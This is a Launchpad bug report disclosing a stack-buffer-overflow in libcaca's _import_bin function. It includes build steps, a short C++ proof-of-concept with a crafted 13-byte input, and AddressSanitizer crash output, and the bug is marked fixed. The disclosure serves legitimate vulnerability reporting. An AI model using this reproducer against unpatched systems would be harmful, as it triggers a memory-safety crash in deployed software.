Ubuntu
libcaca package

stack-buffer-overflow of import.c in function _import_bin

Bug #1925468 reported by xiao huang
256
This bug affects 1 person
Affects Status Importance Assigned to Milestone
libcaca
Fix Released
Unknown
libcaca (Ubuntu)
Fix Released
Undecided
Unassigned

Bug Description

Hello ubuntu security team

issues:https://github.com/cacalabs/libcaca/issues/56

System info:
Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
Fedora 33: clang 11.0.0 , gcc 10.2.1

libcaca version e4968ba

Verification steps:
1.Get the source code of libcaca
2.Compile the libcaca.so library

$ cd libcaca
$ ./bootstrap
$ ./configure
$ make
or

$ cd libcaca
$ ./bootstrap
$ ../configure CC="clang -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" CXX="clang++ -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb"
$ make
3.Create the poc_bin.cc && build

#include "config.h"
#include "caca.h"
//#include "common-image.h"
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fstream>
#include <iostream>

using namespace std;

void crash(const uint8_t *Data, size_t Size) {

  if(Size<8) return ;
  size_t len=0;
  caca_canvas_t *cv;
  cv = caca_create_canvas(0,0);
  caca_create_frame(cv,0);
  caca_set_frame(cv,0);
  caca_import_canvas_from_memory(cv,Data,Size,"bin");
  caca_free_canvas(cv);
  cv=NULL;

}

int main(int args,char* argv[]){
        size_t len = 0;
        unsigned char buffer[] = {0x0a,0x20,0x0a,0x0a,0x20,0x20,0x20,0x20,0x20,0x20,0x47,0x47,0x47};
        len = sizeof(buffer)/sizeof(unsigned char);
        printf("%d\n",sizeof(buffer)/sizeof(unsigned char));
        crash((const uint8_t*)buffer,len);
        return 0;

}
4.compile poc_bin.cc

clang++ -g poc_bin.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_bin
5.Run poc_bin
asan info:

=================================================================
==3817476==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe7cd3774d at pc 0x7f8c6314acfd bp 0x7ffe7cd376c0 sp 0x7ffe7cd376b8
READ of size 1 at 0x7ffe7cd3774d thread T0
    #0 0x7f8c6314acfc in _import_bin /home/hh/Downloads/libcaca/caca/codec/import.c:425:33
    #1 0x4c6c72 in crash(unsigned char const*, unsigned long) /home/hh/Downloads/libcaca/poc_bin.cc:21:3
    #2 0x4c6c72 in main /home/hh/Downloads/libcaca/poc_bin.cc:34:9
    #3 0x7f8c62ba00b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #4 0x41c38d in _start (/home/hh/Downloads/libcaca/poc_bin+0x41c38d)

Address 0x7ffe7cd3774d is located in stack of thread T0 at offset 45 in frame
    #0 0x4c6b9f in main /home/hh/Downloads/libcaca/poc_bin.cc:28

  This frame has 1 object(s):
    [32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
      (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow /home/hh/Downloads/libcaca/caca/codec/import.c:425:33 in _import_bin
Shadow bytes around the buggy address:
  0x10004f99ee90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004f99eea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004f99eeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004f99eec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004f99eed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x10004f99eee0: 00 00 00 00 f1 f1 f1 f1 00[05]f3 f3 00 00 00 00
  0x10004f99eef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004f99ef00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004f99ef10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004f99ef20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004f99ef30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable: 00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone: fa
  Freed heap region: fd
  Stack left redzone: f1
  Stack mid redzone: f2
  Stack right redzone: f3
  Stack after return: f5
  Stack use after scope: f8
  Global redzone: f9
  Global init order: f6
  Poisoned by user: f7
  Container overflow: fc
  Array cookie: ac
  Intra object redzone: bb
  ASan internal: fe
  Left alloca redzone: ca
  Right alloca redzone: cb
  Shadow gap: cc
==3817476==ABORTING

Thanks

See original description
xiao huang (shanzhuli)
information type: Public → Public Security
xiao huang (shanzhuli)
description: updated
Marc Deslauriers (mdeslaur)
Changed in libcaca (Ubuntu):
status: New → Triaged
Bug Watch Updater (bug-watch-updater)
Changed in libcaca:
status: Unknown → New
Bug Watch Updater (bug-watch-updater)
Changed in libcaca:
status: New → Fix Released
Revision history for this message
Fantu (fantonifabio) wrote :

was solved in 0.99.beta20-1

Changed in libcaca (Ubuntu):
status: Triaged → Fix Released
To post a comment you must log in.
This report contains Public Security information  
Everyone can see this security related information.
Subscribing...

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.